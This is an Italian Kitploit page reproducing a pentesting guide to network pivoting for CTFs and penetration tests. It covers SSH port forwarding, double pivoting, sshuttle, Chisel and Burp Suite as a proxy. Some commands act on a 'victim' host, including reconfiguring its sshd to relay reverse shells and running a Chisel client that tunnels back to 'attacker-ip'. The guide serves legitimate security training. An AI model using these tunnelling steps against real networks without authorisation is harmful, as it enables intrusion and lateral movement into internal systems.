Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
pentest-pivoting — Una guida compatta al pivoting di rete per test di penetrazione / sfide CTF. | Kitploit
Strumenti/GitHubGitHub/t3l3machus/pentest-pivoting
Proxy Web e IntercettazioneMovimento LateraleSicurezza di ReteCTFPenetration TestingApprendimento e FormazioneRed TeamingRisorse Curate
GitHubt3l3machus/pentest-pivoting

pentest-pivoting

Una guida compatta al pivoting di rete per test di penetrazione / sfide CTF.

Vedi Repository
228442 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Guida al Pivoting

Indice dei contenuti

  1. Note Importanti
  2. SSH Dynamic Port Forwarding
  3. SSH Remote Port Forwarding
  4. SSH Local Port Forwarding
  5. Doppio Pivoting
  6. sshuttle
  7. Chisel
  8. Usare Burpsuite come Proxy
  9. Risorse Utili

Note Importanti

  • Non usare le richieste di echo ICMP (ping) per testare i proxy SOCKS.
    SOCKS è un protocollo Internet che scambia pacchetti di rete tra un client e un server attraverso un server proxy. In pratica, un server SOCKS inoltra le connessioni TCP verso un indirizzo IP arbitrario e fornisce un mezzo per inoltrare pacchetti UDP. Dovresti testarlo usando un protocollo basato su TCP (ad es. provare a usare SSH o inviare una richiesta HTTP GET a un host attraverso il tunnel di pivoting).

  • NMAP deve essere usato con TCP connect scan (-sT) e senza ping (-Pn)
    Questo vale anche per gli scan di versione (-sV) e di script (-sC). Vanno usati in combinazione con -sT e -Pn.
    Esempi:

    root@kitploit:~
    proxychains nmap -sT -Pn -p- x.x.x.x
    proxychains nmap -sT -Pn -sV -sC -p 21,80,443,445 x.x.x.x
    

    Suggerimento: Puoi caricare naabu sulla macchina vittima e fare scan come un boss.

  • Uso di script e binari con proxychains
    Un suggerimento per usare proxychains è assicurarsi che, se stai eseguendo un programma interpretato (come uno script Python), sia una buona idea fare riferimento esplicitamente al binario Python prima dello script, anche se lo script inizia con uno shebang, ad esempio:

    root@kitploit:~
    proxychains4 [-q -f proxychains.conf] python python_script.py
    

    Senza questo riferimento specifico all'interprete dello script, a volte il traffico generato dallo script non verrà instradato attraverso il proxy come intendevi e la connessione di rete fallirà. Fonte del suggerimento

  • Decommenta la riga "quite mode" in /etc/proxychains.conf per evitare output stdout che a volte possono essere frustranti.
    Questo è soltanto un suggerimento.

SSH Dynamic Port Forwarding

Ti permette di creare un socket sulla macchina locale (client SSH), che funge da server proxy SOCKS. Quando un client si connette a questa porta, la connessione viene inoltrata alla macchina remota (server SSH), che poi la inoltra a una porta dinamica sulla macchina di destinazione.

Come configurarlo:

  1. Modifica /etc/proxychains.conf e applica quanto segue:

    • Rimuovi Dynamic chain dal commento.
    • Commenta Strict chain e Random chain.
    • Aggiungi la riga socks4 127.0.0.1 9050 in fondo al documento (lista proxy), salva e chiudi il file. Ovviamente puoi usare una porta diversa.
  2. Configura l'SSH Dynamic Port Forwarding:

root@kitploit:~
ssh -D 127.0.0.1:9050 user@victim-IP

Esempi di utilizzo:
Con x.x.x.x come indirizzo IP di un host che appartiene alla rete tunnelizzata:

root@kitploit:~
proxychains nmap -sT -Pn -p- x.x.x.x
proxychains smbmap -H x.x.x.x
proxychains ssh [email protected]

Per usare Firefox attraverso il tunnel:

root@kitploit:~
proxychains firefox

SSH Remote Port Forwarding

Se stai cercando come ottenere una reverse shell attraverso un tunnel di pivoting, questo è ciò che ti serve. Ti permette di inoltrare una porta sulla macchina remota (vittima) a una porta sulla macchina locale (attaccante).

Come configurarlo:

  1. Accedi via SSH alla macchina vittima.

  2. Modifica /etc/ssh/sshd_config e applica quanto segue:

    • Rimuovi GatewayPorts no dal commento e cambialo in Yes. Salva e chiudi il file.

    *Questo è molto importante e molte guide in giro per il web non lo menzionano. Se non lo fai, potrai impostare il tunnel solo su 127.0.0.1 anziché su 0.0.0.0, che finirà per non inoltrare il traffico quando proviene da qualsiasi host tranne localhost.

    • Riavvia il servizio SSH perché le modifiche abbiano effetto. sudo service ssh restart
    • Esci e torna alla tua macchina.
  3. Configura l'SSH Remote Port Forwarding:
    In sostanza, dopo averlo configurato come detto, il comando è semplice come questo:

root@kitploit:~
ssh -R 2222:*:2222 user@victim-IP

Per verificare se funziona, puoi fare quanto segue:
Metti in ascolto (ad es. netcat) sulla tua macchina attaccante (sulla porta configurata per l'inoltro remoto, in questo esempio 2222) e invia una richiesta dalla macchina vittima a se stessa (localhost). In questo esempio, sarebbe nc 127.0.0.1 2222. Se la tua macchina attaccante riceve la connessione, significa che a) funziona e b) ogni connessione dagli host in pivoting a victimip:2222 verrà inoltrata alla macchina attaccante.

Puoi impostare più porte in questo modo:

root@kitploit:~
ssh -R 2222:*:2222 -R 3333:*:3333 user@victim-IP

Attenzione: Le richieste da host esterni (rete in pivoting) devono essere indirizzate all'IP della vittima per essere inoltrate alla macchina attaccante.

*Puoi anche implementare il Remote Port Forwarding connettendoti via SSH dalla macchina vittima alla macchina attaccante.

SSH Local Port Forwarding

Il local port forwarding ti consente di inoltrare una porta sulla macchina locale (attaccante) a una porta sulla macchina remota (vittima). Particolarmente utile per scansionare le porte locali sulla vittima.

Uso:

root@kitploit:~
ssh user@victim-IP -L 8888:127.0.0.1:8086

Ora puoi usare ad es. nmap per scansionare la porta 8086 sulla macchina vittima in questo modo:

root@kitploit:~
nmap -Pn -n -p8888 -sV 127.0.0.1

Doppio Pivoting

Un esempio di come implementare il doppio pivoting con SSH Dynamic Port Forwarding e Proxychains.

Concetto:
Supponiamo di avere le seguenti 4 macchine.

IPRuolo
10.10.10.10Attaccante
10.10.10.11Jumphost1
172.16.1.12Jumphost2
172.16.2.13Jumphost3

L'attaccante può raggiungere Jumphost1.
Jumphost1 può raggiungere Jumphost2.
Jumphost2 può raggiungere Jumphost3.

  1. Per raggiungere Jumphost2, segui le istruzioni di SSH Dynamic Port Forwarding menzionate prima, verso Jumphost1.
  2. Per raggiungere Jumphost3, modifica /etc/proxychains.conf e aggiungi un'altra voce proxy in fondo al documento. La fine del tuo proxychains.conf ora sarà simile a questa:
root@kitploit:~
...
socks4 127.0.0.1 9050
socks4 127.0.0.1 9999
  1. Accedi via SSH a Jumphost1 e configura un altro Dynamic Port Forwarding verso Jumphost2 (la porta locale che scegli deve essere la stessa impostata per la seconda voce proxy in proxychains.conf):
root@kitploit:~
ssh -D 127.0.0.1:9999 user@Jumphost2

Ora dovresti essere in grado di raggiungere Jumphost3.

sshuttle

sshuttle ti consente di creare una connessione VPN dalla tua macchina a qualsiasi server remoto tramite ssh, purché quel server abbia python 2.3 o superiore. Per funzionare, devi avere accesso root sulla macchina locale, ma puoi avere un account normale sul server. È valido eseguire sshuttle più di una volta contemporaneamente su una singola macchina client, connettendosi ogni volta a un server diverso, così puoi essere su più VPN contemporaneamente. Controlla il repository GitHub di sshuttle.

Uso:
Supponendo di voler fare pivoting in 172.16.2.0/16:

root@kitploit:~
sshuttle -vvr root@victim 172.16.2.0/16

Se vuoi usare una chiave ssh:

root@kitploit:~
sshuttle -vvr root@victim --ssh-cmd 'ssh -i ~/.ssh/id_rsa' 172.16.2.0/16

Chisel

Chisel è un tunnel TCP/UDP veloce, trasportato su HTTP, protetto tramite SSH. Un singolo eseguibile che include sia client che server. Scritto in Go (golang). È incredibilmente fantastico e utile.

Installazione:
Puoi installare facilmente chisel su kali:

root@kitploit:~
apt install chisel

Per usarlo, devi anche caricare il binario chisel sulla vittima. Puoi scaricare versioni precompilate qui.

Esempio di local port forwarding
Sulla tua macchina attaccante:

root@kitploit:~
chisel server -p 8000 --reverse

Sulla macchina vittima:

root@kitploit:~
./chisel_1.7.7_linux_amd64 client attacker-ip:8000 R:1234:127.0.0.1:8443

Questo inoltrerà il traffico dalla porta 1234 della macchina attaccante alla porta 8443 della macchina vittima.

Usare Burpsuite come Proxy

Burpsuite supporta la possibilità di impostare proxy, una funzionalità incredibilmente utile e potente.

Come configurarlo:
Avvia Burpsuite e applica quanto segue:

  • Vai su Proxy/Options e premi add nella sezione Proxy Listeners.
  • Imposta una porta e un'interfaccia di binding.
  • Nella seconda scheda, imposta l'host e la porta verso cui vuoi reindirizzare il traffico.

In combinazione con la configurazione di un SSH Dynamic Port Forwarding o di sshuttle, ora puoi usare Burpsuite per instradare il traffico verso gli host desiderati inviando traffico alla tua porta di bind su localhost. Un esempio utile con gobuster dir brute attraverso il tunnel (supponendo che tu abbia impostato la porta 2222 come porta di reindirizzamento):

root@kitploit:~
gobuster dir -u http://127.0.0.1:2222 -t 40 -w /some/dirlist.txt

Risorse Utili

  • https://artkond.com/2017/03/23/pivoting-guide/
  • https://catharsis.net.au/blog/network-pivoting-and-tunneling-guide/
  • https://medium.com/cyberxerx/how-to-setup-proxychains-in-kali-linux-by-terminal-618e2039b663
Scarica lo strumento